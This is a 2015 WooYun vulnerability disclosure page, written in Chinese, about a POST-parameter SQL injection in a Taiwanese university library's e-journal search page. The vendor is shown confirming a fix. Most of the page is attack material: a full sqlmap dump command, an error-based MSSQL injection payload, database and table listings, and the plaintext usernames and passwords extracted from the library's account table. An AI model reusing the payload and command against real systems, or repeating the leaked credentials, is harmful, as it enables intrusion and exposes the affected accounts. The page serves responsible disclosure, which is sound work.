当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156854

漏洞标题:國立臺中科技大學圖書館存在POST型SQL註射漏洞(數萬系統信息,備份文件+用戶密碼明文密碼)(臺灣地區)

相关厂商:國立臺中科技大學圖書館

漏洞作者: 路人甲

提交时间:2015-12-01 11:31

修复时间:2016-01-05 19:08

公开时间:2016-01-05 19:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-05: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

一、願景
以培育立型人才為理念,提供專業的圖書館服務,營造學院整合、協同成長之學習環境。

二、目標
1. 空間─營造優質空間
2. 館藏─建構完整資源
3. 專業─精進專業知能
4. 管理─提升管理成效
5. 數位─強化數位內容
6. 服務─提供精緻服務

详细说明:

地址:http://**.**.**.**/database/search/ejournal/JournalList_user.asp

$ python sqlmap.py -u "http://**.**.**.**/database/search/ejournal/JournalList_user.asp" -p Language --technique=BE --form --random-agent --batch -D EDB -T Main -C ID,Password --dump


Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 98318 |
| sys.sysmessages | 98318 |


Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 13660 |


Database: EDB
Table: Main
[9 entries]
+-------------+-----------------+
| ID | Password |
+-------------+-----------------+
| 100325531 | camiojc |
| 103udndata | 103udndata |
| college93 | college93 |
| guest | guest |
| ntit | ntitlib |
| reviewer | 4filibusters356 |
| taiwantrial | 2010trial |
| user0011 | user0011 |
| 自訂 | 自訂 |
+-------------+-----------------+

漏洞证明:

---
Parameter: Language (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: MoveUp=%E4%B8%8A%E4%B8%80%E9%A0%81&ListType=QAsR&ListString=&DisplayNumber=20&Language=djEV' AND 9659=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'hHLx'='hHLx&select_way=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
current user: 'edbsa1'
current user is DBA: False
database management system users [2]:
[*] edbsa1
[*] sa
database management system users password hashes:
[*] edbsa1 [1]:
password hash: NULL
[*] sa [1]:
password hash: NULL
Database: EDB
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.ClassifiedByCollege | 1248 |
| dbo.ClassifiedBySubject | 1009 |
| dbo.ClassifiedByDataType | 537 |
| dbo.Main | 472 |
| dbo.Main_20150128 | 434 |
| dbo.ClassifiedByCollege_20120209 | 332 |
| dbo.TrialSurveyDept | 41 |
| dbo.DataType | 22 |
| dbo.IDAskFor | 17 |
| dbo.Subject | 7 |
| dbo.College | 6 |
| dbo.DatabaseType | 6 |
| dbo.FunctionName | 6 |
| dbo.JournalCoverage | 6 |
| dbo.Status | 6 |
| dbo.College_20120209 | 5 |
| dbo.Survey | 5 |
| dbo.AccessArea | 4 |
| dbo.Platform | 3 |
| dbo.Proxy | 3 |
+--------------------------------------------------+---------+
Database: EJournal
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.Main | 73130 |
| dbo.Main_9 | 70765 |
| dbo.Main_20140121 | 63236 |
| dbo.Main_20150420 | 59129 |
| dbo.main_20120928 | 56744 |
| dbo.main_20110629 | 34278 |
| dbo.sheet1$ | 30699 |
| dbo.電子期刊上傳_BSC2015 | 20395 |
| dbo.電子期刊上傳_華藝 | 13179 |
| dbo.電子期刊上傳_CJTD2015 | 8545 |
| dbo.電子期刊上傳_萬方期刊清單7774刊 | 7774 |
| dbo.電子期刊上傳_ASP2015 | 6126 |
| dbo.電子期刊上傳_CEPS2015 | 4634 |
| dbo.電子期刊上傳_Ecolit2015 | 3042 |
| dbo.電子期刊上傳_OmniFile2015 | 2862 |
| dbo.電子期刊上傳_SDOL2015 | 2221 |
| dbo.電子期刊清單_SDOL | 2221 |
| dbo.電子期刊上傳_ASTS2015 | 1598 |
| dbo.電子期刊上傳_Medline2015 | 1458 |
| dbo.西文電子期刊上傳_ABIR | 1343 |
| dbo.電子期刊上傳_ABIR2015 | 1343 |
| dbo.ACM | 1140 |
| dbo.電子期刊上傳_ACM | 1140 |
| dbo.電子期刊上傳_Hyread2015 | 1136 |
| dbo.西文電子期刊上傳_EJ | 1119 |
| dbo.電子期刊上傳_EJ2015 | 1119 |
| dbo.西文電子期刊清單VSP | 1011 |
| dbo.CJFD期刊清單 | 846 |
| dbo.[電子期刊上傳_PQ-Nursing2015] | 793 |
| dbo.ProQuest | 793 |
| dbo.電子期刊上傳_CINAHL2015 | 760 |
| dbo.電子期刊上傳_PDC2015 | 709 |
| dbo.電子期刊上傳_CMMC2015 | 642 |
| dbo.電子期刊上傳_JSTOR2015 | 600 |
| dbo.電子期刊上傳_PAO | 547 |
| dbo.電子期刊上傳_Library2015 | 368 |
| dbo.電子期刊上傳_SOJA | 259 |
| dbo.電子期刊上傳_MagV2015 | 170 |
| dbo.電子期刊上傳_摩達網 | 170 |
| dbo.[電子期刊上傳-華藝雜誌124種] | 124 |
| dbo.電子期刊上傳_WSPC2015 | 116 |
| dbo.[0522_EM60-2015] | 80 |
| dbo.電子期刊上傳_OJDA | 71 |
| dbo.DB | 63 |
| dbo.電子期刊上傳_華藝雜誌 | 37 |
| dbo.[IEEE CSDL] | 35 |
| dbo.[電子期刊上傳_IEEE CSDL] | 35 |
| dbo.電子期刊上傳_Acer2015 | 27 |
| dbo.[電子期刊上傳_2016中文電子期刊清單-Hyread-app] | 18 |
| dbo.電子期刊上傳_GreenFILE2015 | 14 |
| dbo.Source | 12 |
| dbo.電子期刊上傳_華藝精選電子雜誌 | 10 |
| dbo.西文電子期刊上傳_vogue | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 98318 |
| sys.sysmessages | 98318 |
| sys.fulltext_system_stopwords | 15829 |
| sys.syscolumns | 11966 |
| sys.all_parameters | 7090 |
| sys.system_parameters | 7090 |
| sys.trace_subclass_values | 5366 |
| sys.all_columns | 4670 |
| sys.system_columns | 4626 |
| sys.trace_event_bindings | 4304 |
| sys.syscomments | 2994 |
| dbo.spt_values | 2508 |
| sys.all_objects | 1934 |
| sys.sysobjects | 1934 |
| sys.system_objects | 1928 |
| sys.database_permissions | 1844 |
| sys.syspermissions | 1844 |
| sys.sysprotects | 1843 |
| sys.all_sql_modules | 1783 |
| sys.system_sql_modules | 1783 |
| sys.dm_audit_actions | 454 |
| sys.spatial_reference_systems | 390 |
| sys.event_notification_event_types | 365 |
| sys.all_views | 354 |
| sys.system_views | 354 |
| sys.trigger_event_types | 245 |
| sys.trace_events | 180 |
| sys.allocation_units | 128 |
| sys.partitions | 116 |
| sys.syscharsets | 114 |
| sys.xml_schema_facets | 112 |
| sys.xml_schema_components | 99 |
| sys.system_components_surface_area_configuration | 95 |
| sys.dm_audit_class_type_map | 83 |
| sys.xml_schema_types | 82 |
| sys.configurations | 68 |
| sys.sysconfigures | 68 |
| sys.syscurconfigs | 68 |
| sys.trace_columns | 66 |
| INFORMATION_SCHEMA.COLUMNS | 44 |
| sys.columns | 44 |
| sys.systypes | 34 |
| sys.types | 34 |
| sys.syslanguages | 33 |
| sys.securable_classes | 22 |
| sys.trace_categories | 21 |
| sys.xml_schema_component_placements | 18 |
| sys.xml_schema_attributes | 15 |
| sys.database_principals | 14 |
| sys.sysusers | 14 |
| INFORMATION_SCHEMA.SCHEMATA | 13 |
| sys.database_mirroring | 13 |
| sys.database_recovery_status | 13 |
| sys.databases | 13 |
| sys.schemas | 13 |
| sys.sysdatabases | 13 |
| sys.server_principals | 11 |
| sys.service_contract_message_usages | 11 |
| sys.server_permissions | 7 |
| sys.sysindexes | 7 |
| sys.indexes | 6 |
| sys.objects | 6 |
| sys.stats_columns | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| INFORMATION_SCHEMA.TABLES | 5 |
| sys.index_columns | 5 |
| sys.sysindexkeys | 5 |
| sys.tables | 5 |
| sys.endpoints | 4 |
| sys.assembly_types | 3 |
| sys.service_queue_usages | 3 |
| sys.stats | 3 |
| sys.type_assembly_usages | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.login_token | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.syslogins | 2 |
| sys.user_token | 2 |
| dbo.spt_monitor | 1 |
| sys.assemblies | 1 |
| sys.assembly_files | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_exec_requests | 1 |
| sys.dm_exec_sessions | 1 |
| sys.filegroups | 1 |
| sys.server_role_members | 1 |
| sys.servers | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysprocesses | 1 |
| sys.sysservers | 1 |
| sys.tcp_endpoints | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 13660 |
| dbo.backupmediafamily | 6830 |
| dbo.backupmediaset | 6830 |
| dbo.backupset | 6830 |
| dbo.syspolicy_configuration | 4 |
| dbo.restorefile | 2 |
| dbo.restorefilegroup | 1 |
| dbo.restorehistory | 1 |
+--------------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: EDB
Table: Main
[1 column]
+----------+---------+
| Column | Type |
+----------+---------+
| Password | varchar |
+----------+---------+
Database: EDB
Table: Main_20150128
[1 column]
+----------+---------+
| Column | Type |
+----------+---------+
| Password | varchar |
+----------+---------+
Database: master
Table: sysoledbusers
[1 column]
+-------------+----------+
| Column | Type |
+-------------+----------+
| rmtpassword | nvarchar |
+-------------+----------+
Database: master
Table: syslogins
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: master
Table: sysusers
[1 column]
+----------+-----------+
| Column | Type |
+----------+-----------+
| password | varbinary |
+----------+-----------+
Database: master
Table: sql_logins
[1 column]
+---------------+-----------+
| Column | Type |
+---------------+-----------+
| password_hash | varbinary |
+---------------+-----------+
Database: msdb
Table: backupset
[1 column]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| is_password_protected | bit |
+-----------------------+------+
Database: msdb
Table: backupmediaset
[1 column]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| is_password_protected | bit |
+-----------------------+------+
Database: EDB
Table: Main
[9 entries]
+-----------------+
| Password |
+-----------------+
| 103udndata |
| 2010trial |
| 4filibusters356 |
| camiojc |
| college93 |
| guest |
| ntitlib |
| user0011 |
| 自訂 |
+-----------------+
Database: EDB
Table: Main_20150128
[9 entries]
+-----------------+
| Password |
+-----------------+
| 103udndata |
| 2010trial |
| 4filibusters356 |
| camiojc |
| college93 |
| guest |
| ntitlib |
| user0011 |
| 自訂 |
+-----------------+
Database: msdb
Table: backupset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0 |
+-----------------------+
Database: msdb
Table: backupmediaset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0 |
+-----------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Language (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: MoveUp=%E4%B8%8A%E4%B8%80%E9%A0%81&ListType=QAsR&ListString=&DisplayNumber=20&Language=djEV' AND 9659=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'hHLx'='hHLx&select_way=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
Database: EDB
Table: Main
[40 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| AccessAreaNum | int |
| AccessMode | varchar |
| AllocatedDisk | varchar |
| Annotate | nvarchar |
| Back_up | char |
| BackupYear | varchar |
| ConcurrentUser | nvarchar |
| DatabaseType | varchar |
| DataCoverage | nvarchar |
| Deadline | datetime |
| Domain | varchar |
| EarlyCDROM | char |
| EarlyCDROMYear | varchar |
| ErrorConnection | int |
| FulltextViewer | varchar |
| Guide | nvarchar |
| ID | varchar |
| IDAskForNum | int |
| InvalidAccessdatetime | datetime |
| Item | int |
| Language | nvarchar |
| Movie | nvarchar |
| Note | nvarchar |
| OperationSystem | varchar |
| Password | varchar |
| PlatformNum | int |
| Producer | nvarchar |
| ProxyNum | int |
| SharedFolder | varchar |
| Sort | char |
| Source | varchar |
| StatusNum | int |
| SubjectCoverage | nvarchar |
| SurveyNum | int |
| SurveyURL | varchar |
| TimeCoverage | nvarchar |
| Title | nvarchar |
| Updatedate | datetime |
| UpdateFrequency | varchar |
| Vendor | varchar |
+-----------------------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Language (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: MoveUp=%E4%B8%8A%E4%B8%80%E9%A0%81&ListType=QAsR&ListString=&DisplayNumber=20&Language=djEV' AND 9659=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'hHLx'='hHLx&select_way=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
Database: EDB
Table: Main
[9 entries]
+-------------+-----------------+
| ID | Password |
+-------------+-----------------+
| 100325531 | camiojc |
| 103udndata | 103udndata |
| college93 | college93 |
| guest | guest |
| ntit | ntitlib |
| reviewer | 4filibusters356 |
| taiwantrial | 2010trial |
| user0011 | user0011 |
| 自訂 | 自訂 |
+-------------+-----------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-02 15:56

厂商回复:

感謝通報

最新状态:

2016-01-05:確認修復